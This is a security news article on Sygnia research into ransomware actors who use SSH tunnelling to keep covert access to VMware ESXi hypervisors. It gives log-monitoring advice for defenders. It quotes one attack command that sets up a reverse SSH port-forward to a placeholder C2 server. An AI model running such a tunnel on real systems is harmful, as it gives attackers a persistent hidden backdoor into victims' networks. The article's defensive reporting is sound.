Cybercriminals use SSH tunnelling to access VMware ESXi

Cybercriminals use SSH tunnelling to access VMware ESXi

Ransomware actors targeting ESXi bare-metal hypervisors are using SSH tunnelling to access the system without being detected.

VMware ESXi devices play a crucial role in virtual environments. This, because they can run multiple virtual machines from an organization on a single physical server.

These systems are often barely monitored, Sygnia‘s research shows. They are thus a target for hackers who want to gain access to corporate networks. This allows them to steal data and encrypt files, crippling an entire company by making all virtual machines inaccessible.

Exploiting security vulnerabilities

Cybersecurity firm Sygnia reports that criminals often achieve compromise by exploiting known vulnerabilities or compromised administrator credentials.

ESXi has a built-in SSH service that allows administrators to manage the hypervisor remotely via a shell. According to Sygnia, ransomware actors abuse this feature to achieve persistence, move laterally and deploy ransomware payloads. Since many organizations do not actively monitor SSH activity on ESXi, attackers can use it covertly.

Setting up tunnelling is easy

Once hackers are on the device, setting up tunnelling is simple, using native SSH functionality or implementing other commonly used tools with similar capabilities, explains a Sygnia spokesperson.

For example, by using the SSH binary, remote port-forwarding to the C2 server can easily be set up with the following command:

`ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>`.

Sygnia’s statement shows that since ESXi devices are resilient and rarely shut down unexpectedly, this tunnelling acts as a semi-persistent backdoor within the network.

Flaws in logging

Sygnia also points to challenges in monitoring ESXi logs, which lead to significant visibility gaps that ransomware actors exploit.

Unlike most systems, where logs are aggregated into a single syslog file, ESXi distributes logs across multiple dedicated log files. Thus, finding evidence requires merging information from multiple sources.

The security firm recommends system administrators check the following four log files to detect SSH tunnelling and ransomware activity.

– `/var/log/shell.log` → Tracks command execution in the ESXi Shell
– `/var/log/hostd.log` → Logs administrative activities and user authentication
– `/var/log/auth.log` → Records login attempts and authentication events
– `/var/log/vobd.log` → Contains system and security events

The files `hostd.log` and `vobd.log` probably also contain traces of changes to firewall rules, which is essential for maintaining persistent SSH access.

It is important to note that ransomware actors often erase logs to remove evidence of SSH access, alter timestamps or shorten logs to confuse investigators. Therefore, finding evidence is not always easy.

Recommendations

It is strongly recommended that organizations centralize ESXi logs via syslog forwarding and integrate them into a Security Information & Event Management (SIEM) system to detect anomalies.

Also read: This is what a global phishing campaign looks like